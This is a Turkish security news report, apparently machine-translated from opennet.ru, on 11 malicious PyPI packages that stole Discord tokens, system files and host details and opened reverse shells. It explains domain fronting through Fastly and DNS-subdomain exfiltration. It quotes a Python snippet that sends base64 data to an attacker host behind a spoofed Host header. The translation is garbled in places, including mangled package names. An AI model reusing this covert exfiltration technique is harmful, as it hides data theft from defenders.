PyPI (Python Package Index) dizininde kötü amaçlı kod içeren 11 paket tespit edildi. Sorunlar tespit edilmeden önce paketler toplamda yaklaşık 38 bin kez indirildi. Tespit edilen kötü amaçlı paketler, saldırganların sunucularıyla olan iletişim kanallarını gizlemek için gelişmiş yöntemler kullanmalarıyla dikkat çekiyor.
- önemli paket (6305 indirme), önemli paket (12897) - sisteme kabuk erişimi sağlamak (tersine kabuk) sağlamak için pypi.python.org'a bağlanma kisvesi altında harici bir sunucuya bağlantı kurdu ve trevorc2 programını gizlemek için kullandı. iletişim kanalı.
- pptest (10001), ipboards (946) - sistem hakkında bilgi iletmek için bir iletişim kanalı olarak DNS kullanıldı (ilk pakette ana bilgisayar adı, çalışma dizini, dahili ve harici IP, ikincisinde - kullanıcı adı ve ana bilgisayar adı) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - sistemdeki Discord hizmet belirtecini tanımladı ve harici bir ana bilgisayara gönderdi.
- trrfab (287) - /etc/passwd, /etc/hosts ve /home'un tanımlayıcısını, ana bilgisayar adını ve içeriğini harici ana bilgisayara gönderdi.
- 10Cent10 (490) - harici bir ana bilgisayarla ters kabuk bağlantısı kurdu.
- yandex-yt (4183) - sistemin güvenliğinin ihlal edildiğine dair bir mesaj görüntülendi ve nda.ya.ru (api.ya.cc) aracılığıyla daha sonraki eylemler hakkında ek bilgilerin yer aldığı bir sayfaya yönlendirildi.
Önemli paket ve önemli paket paketlerinde kullanılan ve etkinliklerini gizlemek için PyPI dizininde kullanılan Fastly içerik dağıtım ağını kullanan harici ana bilgisayarlara erişme yöntemi özellikle dikkat çekicidir. Aslında, istekler pypi.python.org sunucusuna gönderildi (HTTPS isteğinde SNI'da python.org adının belirtilmesi dahil), ancak HTTP "Ana Bilgisayar" başlığı saldırganlar tarafından kontrol edilen sunucunun adını içeriyordu (saniye. forward.io.global.prod.fastly.net). İçerik dağıtım ağı, veri iletirken pypi.python.org'a TLS bağlantısının parametrelerini kullanarak saldıran sunucuya benzer bir istek gönderdi.
PyPI altyapısı, tipik istekleri önbelleğe almak için Varnish şeffaf proxy'sini kullanan ve ayrıca HTTPS isteklerini bir proxy aracılığıyla iletmek için uç sunucular yerine CDN düzeyinde TLS sertifika işlemeyi kullanan Fastly içerik dağıtım ağı tarafından desteklenmektedir. Hedef ana bilgisayardan bağımsız olarak istekler, HTTP "Ana Bilgisayar" başlığını kullanarak istenen ana bilgisayarı belirleyen proxy'ye gönderilir ve ana bilgisayar etki alanı adları, tüm Fastly istemcileri için tipik olan CDN yük dengeleyici IP adreslerine bağlanır.
Saldırganların sunucusu aynı zamanda herkese ücretsiz planlar sunan ve hatta anonim kayıtlara izin veren CDN Fastly'ye de kayıt oluyor. Bir "ters kabuk" oluştururken kurbana istek göndermek için bir planın da kullanılması, ancak saldırganın ana bilgisayarı tarafından başlatılması dikkat çekicidir. Dışarıdan bakıldığında, saldırganların sunucusuyla etkileşim, PyPI TLS sertifikası kullanılarak şifrelenen PyPI dizini ile meşru bir oturum gibi görünüyor. "Etki alanı ön yüzleme" olarak bilinen benzer bir teknik, bazı CDN ağlarında SNI'de hayali bir ana bilgisayar belirterek ve aslında sunucunun adını ileterek HTTPS'ye erişmek için sağlanan yeteneği kullanarak, engellemeyi atlarken ana bilgisayar adını gizlemek için aktif olarak kullanıldı. TLS oturumu içindeki HTTP Ana Bilgisayar başlığında istenen ana bilgisayar.
Kötü amaçlı etkinlikleri gizlemek için TrevorC2 paketi ayrıca sunucuyla normal web gezinmesine benzer bir etkileşim sağlamak için kullanıldı; örneğin, "https://pypi.python.org/images/" görüntüsünü indirme kisvesi altında kötü amaçlı istekler gönderildi. guid=” guid parametresinde bilgi kodlamasıyla birlikte. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, başlıklar = {'Host': "psec.forward.io.global.prod.fastly.net"})
Pptest ve ipboards paketleri, DNS sunucusuna yapılan sorgulardaki yararlı bilgilerin kodlanmasına dayalı olarak ağ etkinliğini gizlemek için farklı bir yaklaşım kullandı. Kötü amaçlı yazılım, kontrol sunucusuna iletilen verilerin alt alan adında base4 formatı kullanılarak kodlandığı “nu4timjagq64fimbuhe.example.com” gibi DNS isteklerini gerçekleştirerek bilgi aktarıyor. Saldırgan bu mesajları example.com alan adına ait DNS sunucusunu kontrol ederek alır.
Kaynak: opennet.ru